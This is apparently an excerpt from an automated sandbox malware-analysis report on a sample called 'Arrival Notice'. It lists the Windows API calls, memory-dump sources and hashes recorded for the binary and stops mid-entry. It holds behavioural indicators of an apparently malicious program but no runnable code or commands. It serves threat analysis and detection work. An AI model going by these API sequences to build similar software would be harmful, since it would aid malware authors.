                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                              • String ID:
                                              • API String ID: 1413079979-0
                                              • Opcode ID: b789e5f1dc6c4ee465f56e4f966ee23b3177f2b40af34442da644b4981393134
                                              • Instruction ID: bfa3f92b95002f4fce24764d3ad021f3b69f3afd6804c12759869760269cf51f
                                              • Opcode Fuzzy Hash: b789e5f1dc6c4ee465f56e4f966ee23b3177f2b40af34442da644b4981393134
                                              • Instruction Fuzzy Hash: 261159B2505209ABDF018FA5ED49FEB7BADEF08315F044068FE04A2160C7768D60AB60
                                              APIs
                                                • Part of subcall function 008D12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008D134D
                                                • Part of subcall function 008D12F3: SelectObject.GDI32(?,00000000), ref: 008D135C
                                                • Part of subcall function 008D12F3: BeginPath.GDI32(?), ref: 008D1373
                                                • Part of subcall function 008D12F3: SelectObject.GDI32(?,00000000), ref: 008D139C
                                              • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0095C1C4
                                              • LineTo.GDI32(00000000,00000003,?), ref: 0095C1D8
                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0095C1E6
                                              • LineTo.GDI32(00000000,00000000,?), ref: 0095C1F6
                                              • EndPath.GDI32(00000000), ref: 0095C206
                                              • StrokePath.GDI32(00000000), ref: 0095C216
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                              • String ID:
                                              • API String ID: 43455801-0
                                              • Opcode ID: a06190fbf9f8491361c0119430b8db034d3fa22e84ed58e34d3013eb21a72579
                                              • Instruction ID: 7631ae9aab7f6467f48126c4cc4fcca64c642a5a93fc7ea8deb06e4eae5374e2
                                              • Opcode Fuzzy Hash: a06190fbf9f8491361c0119430b8db034d3fa22e84ed58e34d3013eb21a72579
                                              • Instruction Fuzzy Hash: DC111E7640820CBFDF119F96DC48E9A7FADEF04365F048061B918861A1D7729D55EBA0
                                              APIs
                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 008F03D3
                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 008F03DB
                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 008F03E6
                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 008F03F1
                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 008F03F9
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 008F0401
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Virtual
                                              • String ID:
                                              • API String ID: 4278518827-0
                                              • Opcode ID: 97723496fea2b7f950df184d99432f972522807f63507749ef768fe358c42002
                                              • Instruction ID: ebbae5c9f9b1315f16270a8ddf1aaf284ae5189a378a817feee3d88da7310b22
                                              • Opcode Fuzzy Hash: 97723496fea2b7f950df184d99432f972522807f63507749ef768fe358c42002
                                              • Instruction Fuzzy Hash: 42016CB09027597DE3009F5A8C85B52FFE8FF19354F00411BA15C47941C7F5A864CBE5
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0093569B
                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 009356B1
                                              • GetWindowThreadProcessId.USER32(?,?), ref: 009356C0
                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009356CF
                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009356D9
                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009356E0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                              • String ID:
                                              • API String ID: 839392675-0
                                              • Opcode ID: 32248c7cd49c5bf2f4000e93223da8bd1519667c43035021643cef142b0e477e
                                              • Instruction ID: b58564f9a424215c935efad7fc888ce60b8a33fc88400c18efa78dcf63374ff0
                                              • Opcode Fuzzy Hash: 32248c7cd49c5bf2f4000e93223da8bd1519667c43035021643cef142b0e477e
                                              • Instruction Fuzzy Hash: 76F0123115A658BBE7215B539C0DEAB7B7CEBC6B22F000169FA04D105096A11A0197B5
                                              APIs
                                              • InterlockedExchange.KERNEL32(?,?), ref: 009374E5
                                              • EnterCriticalSection.KERNEL32(?,?,008E1044,?,?), ref: 009374F6
                                              • TerminateThread.KERNEL32(00000000,000001F6,?,008E1044,?,?), ref: 00937503
                                              • WaitForSingleObject.KERNEL32(00000000,000003E8,?,008E1044,?,?), ref: 00937510
                                                • Part of subcall function 00936ED7: CloseHandle.KERNEL32(00000000,?,0093751D,?,008E1044,?,?), ref: 00936EE1
                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00937523
                                              • LeaveCriticalSection.KERNEL32(?,?,008E1044,?,?), ref: 0093752A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                              • String ID:
                                              • API String ID: 3495660284-0
                                              • Opcode ID: f3089ed2b331c9b9c17bdd236ffecf57311e5db46ca7cf5ad1c7b58dc58a8c6d
                                              • Instruction ID: bf67e45c651568dac1ff1318c59fd46dba8b8c9df6974a6eec94e4904e215e1f
                                              • Opcode Fuzzy Hash: f3089ed2b331c9b9c17bdd236ffecf57311e5db46ca7cf5ad1c7b58dc58a8c6d
                                              • Instruction Fuzzy Hash: 8BF05EBA159B12EBEB212B65FC9CAEB772AEF45323F000531F202914B0CB755811EF60
                                              APIs
                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00928E7F
                                              • UnloadUserProfile.USERENV(?,?), ref: 00928E8B
                                              • CloseHandle.KERNEL32(?), ref: 00928E94
                                              • CloseHandle.KERNEL32(?), ref: 00928E9C
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00928EA5
                                              • HeapFree.KERNEL32(00000000), ref: 00928EAC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                              • String ID:
                                              • API String ID: 146765662-0
                                              • Opcode ID: 9befc3d3b3a3fb891010adcbb87557263ad97929d51555d26ea1b2bd9d8397eb
                                              • Instruction ID: 6fa208dc5ab3ac009fb1253b928113c5a644ba4b0e00cf32fa6d8d5bf01144fa
                                              • Opcode Fuzzy Hash: 9befc3d3b3a3fb891010adcbb87557263ad97929d51555d26ea1b2bd9d8397eb
                                              • Instruction Fuzzy Hash: 7AE05276119A05FBDA012FE6EC1C95ABB69FB89773B508631F21981470CB32A461EB50
                                              APIs
                                              • VariantInit.OLEAUT32(?), ref: 00948928
                                              • CharUpperBuffW.USER32(?,?), ref: 00948A37
                                              • VariantClear.OLEAUT32(?), ref: 00948BAF
                                                • Part of subcall function 00937804: VariantInit.OLEAUT32(00000000), ref: 00937844
                                                • Part of subcall function 00937804: VariantCopy.OLEAUT32(00000000,?), ref: 0093784D
                                                • Part of subcall function 00937804: VariantClear.OLEAUT32(00000000), ref: 00937859
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Variant$ClearInit$BuffCharCopyUpper
                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                              • API String ID: 4237274167-1221869570
                                              • Opcode ID: fd35833bb33927a031f10ab9b41610cc7a5af3a09889d456260cdeb5d4040b88
                                              • Instruction ID: 4e6d45d07431a9eda622af34a0d2c990c910bb08f5ffa885b96af37d857047fa
                                              • Opcode Fuzzy Hash: fd35833bb33927a031f10ab9b41610cc7a5af3a09889d456260cdeb5d4040b88
                                              • Instruction Fuzzy Hash: 389137756087019FC714EF28C48496BBBE8EF89354F044A6EF89A8B361DB31E945CB52
                                              APIs
                                                • Part of subcall function 008EFEC6: _wcscpy.LIBCMT ref: 008EFEE9
                                              • _memset.LIBCMT ref: 00933077
                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 009330A6
                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00933159
                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00933187
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: ItemMenu$Info$Default_memset_wcscpy
                                              • String ID: 0
                                              • API String ID: 4152858687-4108050209
                                              • Opcode ID: 057db6533e9b25366efec559c4db10926896c20d34c3a3832242661dede959d9
                                              • Instruction ID: c86eea49272971f70cb2a76f8726bdb1dfd3f145dfafce95f35c2db333a30eac
                                              • Opcode Fuzzy Hash: 057db6533e9b25366efec559c4db10926896c20d34c3a3832242661dede959d9
                                              • Instruction Fuzzy Hash: 8D51B33165C3009ED725DF68C845A6BB7E8EF85360F048A2EF895D7291DB74CE448F92
                                              APIs
                                              • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0092DAC5
                                              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0092DAFB
                                              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0092DB0C
                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0092DB8E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: ErrorMode$AddressCreateInstanceProc
                                              • String ID: DllGetClassObject
                                              • API String ID: 753597075-1075368562
                                              • Opcode ID: 2eb2ad613d2cbd24378248836d58902ffa45df9e547486387f108a9e6ce891f5
                                              • Instruction ID: 9c4cfdb5bbd5a724a098ab9ca35f716d6f1a02acf90da82c7ccc7f5209bbe730
                                              • Opcode Fuzzy Hash: 2eb2ad613d2cbd24378248836d58902ffa45df9e547486387f108a9e6ce891f5
                                              • Instruction Fuzzy Hash: DC41C0B1601318EFDB14CF65D894BAA7BB9EF44310F1580A9AD05DF249D7B0DE40DBA0
                                              APIs
                                              • _memset.LIBCMT ref: 00932CAF
                                              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00932CCB
                                              • DeleteMenu.USER32(?,00000007,00000000), ref: 00932D11
                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00996890,00000000), ref: 00932D5A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Menu$Delete$InfoItem_memset
                                              • String ID: 0
                                              • API String ID: 1173514356-4108050209
                                              • Opcode ID: 514e5cf8f45b99896bdd531ef308a1516c4164595779a368ded17479cc3b03c6
                                              • Instruction ID: 1a690cb7f380787b703f269de2913779c6ad2699d21d83ef08b4d26b02e47715
                                              • Opcode Fuzzy Hash: 514e5cf8f45b99896bdd531ef308a1516c4164595779a368ded17479cc3b03c6
                                              • Instruction Fuzzy Hash: 28416D302043029FD720DF24C845B6ABBE8EF85720F14465EF965972D1DB70E905CF92
                                              APIs
                                              • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0094DAD9
                                                • Part of subcall function 008D79AB: _memmove.LIBCMT ref: 008D79F9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: BuffCharLower_memmove
                                              • String ID: cdecl$none$stdcall$winapi
                                              • API String ID: 3425801089-567219261
                                              • Opcode ID: ec389411829ef7fd71196598b126b51dff4848c99de693ff21ff31be2224b341
                                              • Instruction ID: 17d8aca3329868fd2df9c865f7ab86e72bef78b7a7697c3fc2b87707d6aa74e9
                                              • Opcode Fuzzy Hash: ec389411829ef7fd71196598b126b51dff4848c99de693ff21ff31be2224b341
                                              • Instruction Fuzzy Hash: 1F31A17450061AAFCF10EF68C890DBEB3B4FF05310B108B2AE866E7795DB31A905CB90
                                              APIs
                                                • Part of subcall function 008D7F41: _memmove.LIBCMT ref: 008D7F82
                                                • Part of subcall function 0092B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0092B0E7
                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 009293F6
                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00929409
                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 00929439
                                                • Part of subcall function 008D7D2C: _memmove.LIBCMT ref: 008D7D66
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: MessageSend$_memmove$ClassName
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 365058703-1403004172
                                              • Opcode ID: f340294fdabd72b6daffdc46643ceb16180856ab7e170249f22754c122c81e5d
                                              • Instruction ID: 2140341865b5843939b0b745020db6974db68d6ffe404b5f4a04949edd7d7deb
                                              • Opcode Fuzzy Hash: f340294fdabd72b6daffdc46643ceb16180856ab7e170249f22754c122c81e5d
                                              • Instruction Fuzzy Hash: 37212671940118BFDB14AB74EC85DFFB7BCEF45324F14422AF921972E4DB38090A9610
                                              APIs
                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00941B40
                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00941B66
                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00941B96
                                              • InternetCloseHandle.WININET(00000000), ref: 00941BDD
                                                • Part of subcall function 00942777: GetLastError.KERNEL32(?,?,00941B0B,00000000,00000000,00000001), ref: 0094278C
                                                • Part of subcall function 00942777: SetEvent.KERNEL32(?,?,00941B0B,00000000,00000000,00000001), ref: 009427A1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                              • String ID:
                                              • API String ID: 3113390036-3916222277
                                              • Opcode ID: f918870e64e84d672d8a4eb49c1ace523641ea1791b9f294d24ad3e7e4a18d17
                                              • Instruction ID: ac0d7e7e0d1589450799e11f5238e95a6be509503740e0eb02d60521e94cd314
                                              • Opcode Fuzzy Hash: f918870e64e84d672d8a4eb49c1ace523641ea1791b9f294d24ad3e7e4a18d17
                                              • Instruction Fuzzy Hash: 0F21CAB1604308BFEB119F219CD5EBF76ECEB89B58F10012AF905A7240EB249D44A7A1
                                              APIs
                                                • Part of subcall function 008D1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 008D1D73
                                                • Part of subcall function 008D1D35: GetStockObject.GDI32(00000011), ref: 008D1D87
                                                • Part of subcall function 008D1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 008D1D91
                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 009566D0
                                              • LoadLibraryW.KERNEL32(?), ref: 009566D7
                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 009566EC
                                              • DestroyWindow.USER32(?), ref: 009566F4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                              • String ID: SysAnimate32
                                              • API String ID: 4146253029-1011021900
                                              • Opcode ID: 4d2828c8f78219101159d3e4d1fe664f717d779989b73727d28e864163592699
                                              • Instruction ID: 23902a479bde9961816dfcba1cafff86f2600363d7559d349c77aa7de9046b5d
                                              • Opcode Fuzzy Hash: 4d2828c8f78219101159d3e4d1fe664f717d779989b73727d28e864163592699
                                              • Instruction Fuzzy Hash: C721BE71100205ABEF108E6AEC90EAB77ADEB5937AF900629FD1093190C771CC45A760
                                              APIs
                                              • GetStdHandle.KERNEL32(0000000C), ref: 0093705E
                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00937091
                                              • GetStdHandle.KERNEL32(0000000C), ref: 009370A3
                                              • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 009370DD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: CreateHandle$FilePipe
                                              • String ID: nul
                                              • API String ID: 4209266947-2873401336
                                              • Opcode ID: 0ae7e64425638d4e18ef81c2de8ce43bdef47caaaf71836a713486cce1fadbd7
                                              • Instruction ID: 1e0d55557bb864c7b9efcdb201e05d1daedda35dc56351a769eda7401a3c461a
                                              • Opcode Fuzzy Hash: 0ae7e64425638d4e18ef81c2de8ce43bdef47caaaf71836a713486cce1fadbd7
                                              • Instruction Fuzzy Hash: C4215EB4508309ABDB349FB9DC05A9AB7A8AF84720F208A19FCA1D72D0E77098509F50
                                              APIs
                                              • GetStdHandle.KERNEL32(000000F6), ref: 0093712B
                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0093715D
                                              • GetStdHandle.KERNEL32(000000F6), ref: 0093716E
                                              • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 009371A8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: CreateHandle$FilePipe
                                              • String ID: nul
                                              • API String ID: 4209266947-2873401336
                                              • Opcode ID: 044ecd815acb7e44fd9c4d5e2d7606af79873452cd8305071f26068bbd363b1f
                                              • Instruction ID: 3282a5c7224a14a5f94ef7759eb55df171a5bd57dbad5da89f4cab2e521edb05
                                              • Opcode Fuzzy Hash: 044ecd815acb7e44fd9c4d5e2d7606af79873452cd8305071f26068bbd363b1f
                                              • Instruction Fuzzy Hash: 7A215EB650C309ABDB309FE99C04AAAB7A8AF55730F204A19F9A1D72D0D77098418F61
                                              APIs
                                              • SetErrorMode.KERNEL32(00000001), ref: 0093AEBF
